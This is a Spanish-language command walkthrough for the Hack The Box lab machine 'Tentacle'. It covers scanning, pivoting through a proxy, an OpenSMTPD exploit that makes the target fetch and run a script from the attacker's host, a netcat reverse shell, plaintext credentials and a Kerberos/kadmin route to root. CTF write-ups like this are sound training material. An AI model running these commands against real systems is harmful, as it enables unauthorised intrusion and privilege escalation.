Tentacle
HTB Linux
echo "10.129.50.237 tentacle.htb" | sudo tee -a /etc/hosts
ping -c 1 10.129.50.237
nmap -A -p- -oA tentacle 10.129.50.237 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA tentacle 10.129.50.237
nmap -sU -O -p- -oA tentacle-udp 10.129.50.237
Si vamos a http://10.129.50.237:3128
Vemos que tienen dos subdominios en la pagina y los agregamos realcorp.htb y srv01.realcorp.htb al /etc/hosts
dig @10.129.50.237 realcorp.htb
dig @10.129.50.237 realcorp.htb ns
dig @10.129.50.237 realcorp.htb mx
dig @10.129.50.237 realcorp.htb axfr
Agregamos http 10.129.50.237 a etc/proxychains.conf
proxychains nmap -sT -Pn -v -n 127.0.0.1
dnsenum --dnserver 10.129.50.237 -f /usr/share/seclists/Discovery/DNS/subdomain-topmillion-110000.txt realcorp.htb
Agregamos lo siguiente en /etc/hosts
Vamos a /etc/proxychains.conf y agregamos lo siguiente:
proxychains nmap -sT -Pn -v -n 10.197.243.77
Creamos un script para chequear puertos
./proxychains_portScanner.sh
Modificamos proxychains.conf
corremos el bash de nuevo
./proxychains_portScanner.sh
proxychains curl http://wpad.realcorp.htb/wpad.dat | bat -l js
Modificamos el script
Corremos el script de bash
nmap -sT -Pn -p25 -sCV 10.241.251.113
searchsploit opensmtpd
searchsploit -m 47984
cat users
/opt/kerbrute/kerbrute usernum --dc 10.129.50.237 -d realcorp.htb users
proxychains python3 47984.py 10.241.251.113 25 'wget 10.10.14.73'
Creamos un archivo llamado cu3rvox.sh
cat cu3rv0x.sh
En el archivo 47984.py cambias <\root> a <\j.nakazawa@realcorp.htb>
Podemos ver que el servidor responde con un 200 despues del GET
proxychains python3 47984.py 10.241.251.113 25 'bash /tmp/cu3rv0x.sh'
nc -lvnp 4444
sshpass -p 'sJB}RM>6z~64_' ssh j.nakazawa@10.129.50.237
Abrimos /etc/krb5.conf
default_realm = REALCORP.HTB
REALCORP.HTB = {
kdc = 10.129.50.237
}
kinit j.nakazawa
klist
ssh j.nakazawa@10.129.50.237
Credenciales -> j.nakazawa:sJB}RM>6Z~64_
cat user.txt
cat /etc/crontab
cat /usr/local/bin/log_backup.sh
echo "j.nakazawa@REALCORP.HTB" > .k5login
cat .k5login
cp .k5login /var/log/squid
ssh admin@srv01.realcorp.htb
klist -k /etc/krb5.keytab
kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB
add_principal root@REALCORP.HTB
Creamos una contrasena para root@REALCORP.HTB
exit
ksu root